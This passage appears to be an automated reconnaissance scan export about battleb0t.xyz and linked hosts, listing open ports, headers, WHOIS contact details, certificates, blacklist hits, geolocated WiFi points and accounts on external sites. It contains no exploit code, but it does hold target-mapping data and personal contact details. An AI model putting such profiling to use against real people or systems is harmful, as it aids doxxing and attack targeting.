max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2078 | 87.248.157.102 |
| 2023-05-12 02:45:47 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8001::153 |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00088.github.io |
| 2023-05-12 03:11:13 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 3 | 0 | None | CVE-2011-3389
https://nvd.nist.gov/vuln/detail/CVE-2011-3389
Score: 4.3
Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. | vscode.battleb0t.xyz |
| 2023-05-12 02:54:57 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c443d4879e76326-ORD
Content-Encoding: gzip
| 2a06:98c1:3120::1 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:38:37 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (207.154.228.160) | 207.154.228.160 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.67): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.109.153 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | France | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
|
| 2023-05-12 02:55:21 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 207.154.228.169:22 | 207.154.228.169 |
| 2023-05-12 03:33:49 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | MiCCPICC Profile
U$JLQ
clc$1
pHYs
iTXtXML:com.adobe.xmp
<exif:PixelYDimension>1024</exif:PixelYDimension>
<exif:PixelXDimension>1024</exif:PixelXDimension>
<tiff:Orientation>1</tiff:Orientation>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
IDATx
:-$oT'/
ykl_\
$GsPUa
O3N>RB
J"RKn
:Y:Dlm2
wLHH2
4<V0q
Tbi/O
Iy5: @
z0 rSOJ
Q8m0Sc
BFSvMl
:/t@S
te's8
'r_$E:
t<c:`
SxUAn
GB:`_3
.?'X$
0<Zqjyc
fTF7g
tF`"d
uC1o\
uOV`B
W9o0/
vXv5q
EKjPW
\BypB
MeTZAtj
FdAdi
ZVM$\
RK59C
WrF.w
qadakhZ
aWl>E
B.G E
/2S/yT
?N2If
_ZkowDdu
ihLaY
<q36o
\mHTs
$Sa!TuVQ
`xSkY
!FfcGgy
Twj c
l9nPO
O_R@N
bW.F`y
9v-lh
IDATE
SeR'c
JS Ik
2.S\D
3@9@h
oe1`sf?z
9ud>I
mE:Gf7
Tdb0P
-uy:Y@BE
3zRHFofBQ
g'YtL
Lx j8m/J
'A_>dW
CJ1eI
wIQ!9t
d0d'L
VLYrd
::vC1
N/38Am
'k!mL
zymOhf
T'y0l
d3o3A1
-IUSN
?rF_3
rvf5EZ
Am``"1
fBmM>
>f q9c
cQ"n!cYQy
XBMUx
mtc-2
p4va`W
Gj6Xz
oxCs6
ZSB64 | https://fluid.battleb0t.xyz/logo.png |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [000b000.github.io]
https://www.openphish.com/feed.txt | 000b000.github.io |
| 2023-05-12 02:46:50 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 34.74.170.74 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | vscode.battleb0t.xyz |
| 2023-05-12 02:55:27 | BGP AS Membership | No | URLScan.io | 0 | 0 | 1 | 0 | None | 14061 | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000407.github.io | 185.199.111.153 |
| 2023-05-12 03:11:27 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242598', u'local': u'(480) 624-2598'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242598', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242598 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.84): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.109 | 87.248.157.102 |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.213): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Paradiso Films - NL (Net ID: 00:01:21:31:1A:19) | 52.3759, 4.8975 |
| 2023-05-12 03:04:14 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 3 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-110-153.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-110-153.github.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PARPUDAR (Net ID: 00:02:CF:AD:76:95) | 40.2024, 29.0398 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.146): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/Altpapier?version=2 | Altpapier |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 34.74.170.74 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Ziggo04216 (Net ID: 00:0C:F6:5A:10:78) | 50.8897, 6.0563 |
| 2023-05-12 03:16:19 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3121::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5095, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'EC4N', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0955, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} | 2a06:98c1:3121::1 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.97): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:8C:21:B1) | 39.0469, -77.4903 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | krillnet (Net ID: 00:01:8E:15:D4:A6) | 37.780462,-122.390564 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-g (Net ID: 00:06:25:C0:3E:05) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.193): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/master058_2.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MyBuilder.com (Category: social)
https://www.mybuilder.com/profile/view/ayshoo | ayshoo |
| 2023-05-12 02:45:51 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 2 | 0 | None | webroot.com [104.21.6.166] | 104.21.6.166 |
| 2023-05-12 03:00:30 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | hmac-sha2-512-etm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T01:15:51.449Z", "ip": "207.154.228.169", "labels": ["remote-access"], "location_updated_at": "2023-04-26T16:44:53.689109Z", "autonomous_system_updated_at": "2023-04-26T16:44:53.689174Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:33.692371432Z"}, "www.gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T18:54:15.274018983Z"}, "www.blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.495668467Z"}, "sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:58.102845672Z"}, "mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-09T22:38:36.279855979Z"}, "sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:34.142966985Z"}, "www.magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-25T04:27:35.542554385Z"}, "the.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:05.045794814Z"}, "git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-18T22:02:08.010914546Z"}, "why.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.763792122Z"}, "blog.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:41.064561319Z"}, "pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.203437608Z"}, "www.staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:31.907335501Z"}, "www.mail.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.687219106Z"}, "www.polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:50.199285708Z"}, "www.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-27T22:00:33.577672224Z"}, "dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.141552446Z"}, "gitlab.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-22T10:53:09.803238695Z"}, "magento.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:18.482468579Z"}, "abs.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:22.221262680Z"}, "shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:40.132954471Z"}, "apk.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:33.628764632Z"}, "www.sitemaps.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.479130613Z"}, "store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.021634906Z"}, "www.mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-02T14:44:59.299521244Z"}, "blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:12.270323061Z"}, "www.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:51.220733315Z"}, "gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:25.974047797Z"}, "getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T23:59:43.775790789Z"}, "www.test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:04.458677133Z"}, "www.sitemap.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:35.410578926Z"}, "27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-02T15:40:49.792043016Z"}, "www.27e4e4d6-2b15-11ec-91f8-7446a0f559b0.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-26T21:45:11.528325040Z"}, "polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:11.409230997Z"}, "staging.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-23T16:20:15.055432105Z"}, "www.old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-18T22:01:33.780417520Z"}, "www.gitlab.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:09.056676609Z"}, "the.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:43.060825855Z"}, "mail.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:03.585095495Z"}, "old.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T22:28:10.411213800Z"}, "www.shop.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.772740465Z"}, "posadisad.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:15.103803419Z"}, "www.git.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-22T17:03:24.300688116Z"}, "app.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:28.045102600Z"}, "www.store.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T16:00:25.103894275Z"}, "on.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.198972199Z"}, "www.blog.getsimnum.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:08.475610608Z"}, "www.dev.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-26T21:44:39.836624314Z"}, "crm.sirket.im": {"record_type": "A", "resolved_at": "2023-05-10T17:17:53.506957947Z"}, "javadfra.softether.net": {"record_type": "A", "resolved_at": "2023-05-09T20:04:58.925278232Z"}, "www.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-28T15:47:18.498526700Z"}, "tsxwdq.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-29T17:33:24.980088481Z"}, "wow.posadisad.com": {"record_type": "A", "resolved_at": "2023-03-20T14:24:20.099465955Z"}, "test.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-20T00:13:37.049342133Z"}, "what.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-17T14:45:49.646289405Z"}, "at.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-13T14:57:51.931938167Z"}, "polygon.posadisad.com": {"record_type": "A", "resolved_at": "2023-04-03T15:35:42.054213831Z"}, "in.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.386503067Z"}, "www.polygon.pointlane.com": {"record_type": "A", "resolved_at": "2023-04-01T16:22:34.836285670Z"}, "www.demo.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-30T00:47:02.797080934Z"}, "app.pointlane.com": {"record_type": "A", "resolved_at": "2023-03-31T16:03:06.212849951Z"}}, "names": 